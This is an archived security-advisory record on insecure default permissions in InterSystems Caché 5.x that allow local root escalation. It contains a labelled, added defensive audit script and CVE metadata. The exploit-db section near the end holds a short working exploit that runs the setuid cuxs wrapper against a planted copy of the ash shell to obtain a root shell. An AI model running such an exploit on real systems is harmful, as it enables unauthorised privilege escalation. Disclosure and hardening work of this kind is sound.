ID PACKETSTORM:31292 Type packetstorm Reporter Larry W. Cashdollar Modified 2003-07-03T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 07.01.03:
http://www.idefense.com/advisory/07.01.03.txt
Caché Insecure Installation File and Directory Permissions
July 1, 2003
I. BACKGROUND
InterSystems Corp.'s Caché is a post-relational database for
e-applications that is optimized for web applications. More information
about the application is available at
http://www.intersystems.com/cache/index.html .
II. DESCRIPTION
Caché installs with insecure file and directory permissions, thereby
allowing local attackers to gain root access by manipulating items in
the main package tree. The vulnerability specifically exists because
files and directories are open to all users for read, write, and
execute operations. An example of such a directory is the ecache/bin
directory:
[farmer@vmlinux ecache]$ ls -ld bin
drwxrwxrwx 2 root root 4096 May 2 05:34 bin
The displayed permissions are that of a default install.
III. ANALYSIS
Two attack vectors exist by which any local attacker can gain root
privileges:
* Overwriting a globally writeable binary that is executed from a set
user id (setuid) root binary by the wrapper, /cachesys/bin/cuxs.
* Executing a server side script from /cachesys/csp/user. The content
in that directory is executed as root through the web interface.
IV. DETECTION
Caché Database 5.x is affected. Older versions may be vulnerable as
well.
V. WORKAROUND
Administrators can prevent exploitation by making file permissions more
restrictive. This should prevent attackers from overwriting binaries or
placing scripts in /cachesys/csp/user.
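As an added illustration of the workaround above (this script is not part of the iDEFENSE advisory or of InterSystems' software), the following POSIX shell functions audit an install tree for world-writable files and directories and for setuid binaries, and strip the world-write bit from anything that has it. The sample tree it builds is constructed to mirror the advisory's cachesys/bin and cachesys/csp/user layout; the function names, the temporary install root and the file contents are assumptions.

```shell
#!/bin/sh
# Added example, not the advisory's own code. Assumes a POSIX sh with
# find(1), chmod(1), mktemp(1), wc(1) and sort(1) available.

# Print every world-writable file or directory under $1, one per line.
# "-perm -002" matches entries whose permission bits include o+w;
# symlinks are skipped because their mode bits are not meaningful.
find_world_writable() {
    find "$1" -perm -002 ! -type l 2>/dev/null | sort
}

# Print every setuid file under $1. A setuid binary inside a tree that
# also has world-writable entries is the combination the advisory warns
# about, so both lists belong in the same report.
find_setuid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# Number of world-writable entries under $1 (used for a quick pass/fail).
count_world_writable() {
    find_world_writable "$1" | wc -l | tr -d ' '
}

# Remove world write permission from everything under $1 that has it.
# Owner/group bits are left alone; only o-w is applied.
harden_tree() {
    find "$1" -perm -002 ! -type l -exec chmod o-w {} + 2>/dev/null
}

# Build a constructed sample tree in a temp dir that reproduces the
# advisory's observation: a 0777 bin directory and a 0777 csp/user
# directory. Paths and contents are placeholders, not real product files.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/cachesys/bin" "$root/cachesys/csp/user"
    printf '#!/bin/sh\necho placeholder\n' > "$root/cachesys/bin/cache"
    printf 'placeholder page\n' > "$root/cachesys/csp/user/hello.csp"
    chmod 777 "$root/cachesys/bin" "$root/cachesys/csp/user"
    chmod 777 "$root/cachesys/bin/cache"
    chmod 644 "$root/cachesys/csp/user/hello.csp"
    printf '%s\n' "$root"
}

# Human-readable report for an install root given on the command line.
report() {
    printf 'World-writable entries under %s:\n' "$1"
    find_world_writable "$1"
    printf 'Setuid files under %s:\n' "$1"
    find_setuid "$1"
}

# Usage: sh audit.sh /path/to/cachesys   (report only, no changes made)
if [ -n "${1:-}" ]; then
    report "$1"
fi
```

Run with the install root as the only argument to get the report; call `harden_tree` separately once the list has been reviewed, since some installs may legitimately rely on group-writable (not world-writable) paths that this script leaves untouched.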
VI. VENDOR FIX
InterSystems provided an alert to its customer base that is viewable at
http://www.intersystems.com/support/flash/index.html. In it, the
company said that the installation defaults will be changed in Caché
4.1.16 and 5.0.3.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification numbers to these issues:
CAN-2003-0497 overwrite Caché using setuid cuxs program
CAN-2003-0498 code injection into /cachesys/csp
VIII. DISCLOSURE TIMELINE
11 MAR 2003 First attack vector disclosed to iDEFENSE
18 APR 2003 Second attack vector disclosed to iDEFENSE
10 JUN 2003 Research Completed on Issues
10 JUN 2003 InterSystems Corporation notified
11 JUN 2003 Response from David Shambroom of InterSystems
01 JUL 2003 Coordinated Public Disclosure
IX. CREDIT
Larry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world, from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP
oo0XQnUmHaiPOM98pFIKow4n
=lKCb
-----END PGP SIGNATURE-----
To stop receiving iDEFENSE Security Advisories, reply to this message and put "unsubscribe" in the subject.
{"id": "PACKETSTORM:31292", "type": "packetstorm", "bulletinFamily": "exploit", "title": "intersystems.txt", "description": "", "published": "2003-07-03T00:00:00", "modified": "2003-07-03T00:00:00", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "href": "https://packetstormsecurity.com/files/31292/intersystems.txt.html", "reporter": "Larry W. Cashdollar", "references": [], "cvelist": ["CVE-2003-0497", "CVE-2003-0498"], "lastseen": "2016-12-05T22:15:46", "viewCount": 8, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-12-05T22:15:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0497", "CVE-2003-0498"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:4770"]}, {"type": "osvdb", "idList": ["OSVDB:2229", "OSVDB:11916"]}, {"type": "exploitdb", "idList": ["EDB-ID:22847"]}], "modified": "2016-12-05T22:15:46", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://packetstormsecurity.com/files/download/31292/intersystems.txt", "sourceData": "` \n-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \niDEFENSE Security Advisory 07.01.03: \nhttp://www.idefense.com/advisory/07.01.03.txt \nCach\u00e9 Insecure Installation File and Directory Permissions \nJuly 1, 2003 \n \nI. BACKGROUND \n \nInterSystems Corp.\u0092s Cach\u00e9 is a post-relational database for \ne-applications that is optimized for web applications. More information \nabout the application is available at \nhttp://www.intersystems.com/cache/index.html . \n \nII. DESCRIPTION \n \nCach\u00e9 installs with insecure file and directory permissions, thereby \nallowing local attackers to gain root access by manipulating items in \nthe main package tree. The vulnerability specifically exists because \nfiles and directories are open to all users for read, write, and \nexecute operations. 
An example of such a directory is the ecache/bin \ndirectory: \n \n[farmer@vmlinux ecache]$ ls -ld bin \ndrwxrwxrwx 2 root root 4096 May 2 05:34 bin \n \nThe displayed permissions are that of a default install. \n \nIII. ANALYSIS \n \nTwo attack vectors exist by which any local attacker can gain root \nprivileges: \n \n* Overwriting a globally writeable binary that is executed from a set \nuser id (setuid) root binary by the wrapper, /cachesys/bin/cuxs. \n \n* Executing a server side script from /cachesys/csp/user. The content \nin that directory is executed as root through the web interface. \n \nIV. DETECTION \n \nCach\u00e9 Database 5.x is affected. Older versions may be vulnerable as \nwell. \n \nV. WORKAROUND \n \nAdministrators can prevent exploitation by making file permissions more \nrestrictive. This should prevent attackers from overwriting binaries or \nplacing scripts in /cachesys/csp/user. \n \nVI. VENDOR FIX \n \nInterSystems provided an alert to its customer base that is viewable at \nhttp://www.intersystems.com/support/flash/index.html. In it, the \ncompany said that the installation defaults will be changed in Cach\u00e9 \n4.1.16 and 5.0.3. \n \nVII. CVE INFORMATION \n \nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project \nhas assigned the identification numbers to these issues: \n \nCAN-2003-0497 overwrite Cach\u00e9 using setud cuxs program \nCAN-2003-0498 code injection into /cachesys/csp \n \nVIII. DISCLOSURE TIMELINE \n \n11 MAR 2003 First attack vector disclosed to iDEFENSE \n18 APR 2003 Second attack vector disclosed to iDEFENSE \n10 JUN 2003 Research Completed on Issues \n10 JUN 2003 InterSystems Corporation notifed \n11 JUN 2003 Response from David Shambroom of InterSystems \n01 JUL 2003 Coordinated Public Disclosure \n \nIX. CREDIT \n \nLarry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability. 
\n \n \nGet paid for security research \nhttp://www.idefense.com/contributor.html \n \nSubscribe to iDEFENSE Advisories: \nsend email to listserv@idefense.com, subject line: \"subscribe\" \n \n \nAbout iDEFENSE: \n \niDEFENSE is a global security intelligence company that proactively \nmonitors sources throughout the world \u0097 from technical \nvulnerabilities and hacker profiling to the global spread of viruses \nand other malicious code. Our security intelligence services provide \ndecision-makers, frontline security professionals and network \nadministrators with timely access to actionable intelligence \nand decision support on cyber-related threats. For more information, \nvisit http://www.idefense.com . \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: PGP 8.0 \n \niQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP \noo0XQnUmHaiPOM98pFIKow4n \n=lKCb \n-----END PGP SIGNATURE----- \n \nTo stop receiving iDEFENSE Security Advisories, reply to this message and put \"unsubscribe\" in the subject. \n`\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Cach\u00e9 Database 5.x installs the /cachesys/csp directory with insecure permissions, which allows local users to execute arbitrary code by adding server-side scripts that are executed with root privileges.", "edition": 6, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0498", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0498"], "modified": "2020-02-10T21:05:00", "cpe": ["cpe:/a:intersystems:cache_database:5"], "id": "CVE-2003-0498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0498", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:intersystems:cache_database:5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:02", "description": "Cach\u00e9 Database 5.x installs /cachesys/bin/cache with world-writable permissions, which allows local users to gain privileges by modifying cache and executing it via cuxs.", "edition": 6, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0497", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0497"], "modified": "2020-02-10T21:05:00", "cpe": ["cpe:/a:intersystems:cache_database:5"], "id": "CVE-2003-0497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0497", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:intersystems:cache_database:5:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "cvelist": ["CVE-2003-0497", "CVE-2003-0498"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDEFENSE Security Advisory 07.01.03:\r\nhttp://www.idefense.com/advisory/07.01.03.txt\r\nCaché Insecure Installation File and Directory Permissions\r\nJuly 1, 2003\r\n\r\nI. BACKGROUND\r\n\r\nInterSystems Corp.\u2019s Caché is a post-relational database for\r\ne-applications that is optimized for web applications. More information\r\nabout the application is available at\r\nhttp://www.intersystems.com/cache/index.html .\r\n\r\nII. DESCRIPTION\r\n\r\nCach\u0439 installs with insecure file and directory permissions, thereby\r\nallowing local attackers to gain root access by manipulating items in\r\nthe main package tree. The vulnerability specifically exists because\r\nfiles and directories are open to all users for read, write, and\r\nexecute operations. An example of such a directory is the ecache/bin\r\ndirectory:\r\n\r\n[farmer@vmlinux ecache]$ ls -ld bin\r\ndrwxrwxrwx 2 root root 4096 May 2 05:34 bin\r\n\r\nThe displayed permissions are that of a default install.\r\n\r\nIII. ANALYSIS\r\n\r\nTwo attack vectors exist by which any local attacker can gain root\r\nprivileges:\r\n\r\n* Overwriting a globally writeable binary that is executed from a set\r\nuser id (setuid) root binary by the wrapper, /cachesys/bin/cuxs.\r\n\r\n* Executing a server side script from /cachesys/csp/user. 
The content\r\nin that directory is executed as root through the web interface.\r\n\r\nIV. DETECTION\r\n\r\nCaché Database 5.x is affected. Older versions may be vulnerable as\r\nwell.\r\n\r\nV. WORKAROUND\r\n\r\nAdministrators can prevent exploitation by making file permissions more\r\nrestrictive. This should prevent attackers from overwriting binaries or\r\nplacing scripts in /cachesys/csp/user.\r\n\r\nVI. VENDOR FIX\r\n\r\nInterSystems provided an alert to its customer base that is viewable at\r\nhttp://www.intersystems.com/support/flash/index.html. In it, the\r\ncompany said that the installation defaults will be changed in Caché\r\n4.1.16 and 5.0.3.\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project\r\nhas assigned the identification numbers to these issues:\r\n\r\nCAN-2003-0497 overwrite Cach\u0439 using setud cuxs program\r\nCAN-2003-0498 code injection into /cachesys/csp\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n11 MAR 2003 First attack vector disclosed to iDEFENSE\r\n18 APR 2003 Second attack vector disclosed to iDEFENSE\r\n10 JUN 2003 Research Completed on Issues\r\n10 JUN 2003 InterSystems Corporation notifed\r\n11 JUN 2003 Response from David Shambroom of InterSystems\r\n01 JUL 2003 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nLarry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world \u2014 from technical\r\nvulnerabilities and hacker profiling to the global spread of viruses\r\nand other malicious code. 
Our security intelligence services provide\r\ndecision-makers, frontline security professionals and network\r\nadministrators with timely access to actionable intelligence\r\nand decision support on cyber-related threats. For more information,\r\nvisit http://www.idefense.com .\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP\r\noo0XQnUmHaiPOM98pFIKow4n\r\n=lKCb\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2003-07-02T00:00:00", "published": "2003-07-02T00:00:00", "id": "SECURITYVULNS:DOC:4770", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4770", "title": "[Full-Disclosure] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0498"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 2229](https://vulners.com/osvdb/OSVDB:2229)\nISS X-Force ID: 12476\n[CVE-2003-0498](https://vulners.com/cve/CVE-2003-0498)\nBugtraq ID: 8070\n", "modified": "2003-07-01T00:00:00", "published": "2003-07-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11916", "id": "OSVDB:11916", "title": "Cach\u00e9 Database /cachesys/csp Directory Weak Permission Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0497"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 
12476\n[CVE-2003-0497](https://vulners.com/cve/CVE-2003-0497)\nBugtraq ID: 8070\n", "modified": "2003-07-01T06:34:37", "published": "2003-07-01T06:34:37", "href": "https://vulners.com/osvdb/OSVDB:2229", "id": "OSVDB:2229", "type": "osvdb", "title": "Cach\u00e9 Database /cachesys/bin/cache Weak Permission Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:40:50", "description": "InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability. CVE-2003-0497. Local exploit for linux platform", "published": "2003-07-01T00:00:00", "type": "exploitdb", "title": "InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0497"], "modified": "2003-07-01T00:00:00", "id": "EDB-ID:22847", "href": "https://www.exploit-db.com/exploits/22847/", "sourceData": "source: http://www.securityfocus.com/bid/8070/info\r\n\r\nIt has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. 
This creates many opportunities for local attackers to obtain root privileges.\r\n\r\n#!/bin/sh\r\n# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.\r\n# this started as an exploit for scenario1 in\r\n# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else\r\n# A snippetisnip from an strace of the cuxs binary shows:\r\n# execve(\"../bin/cache\", [\"cache\"], [/* 19 vars */])\r\n# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s\r\n\r\nTARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`\r\nmkdir -p crapche/bin\r\ncd crapche/bin\r\ncp `which ash` cache\r\n$TARGET\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22847/"}]}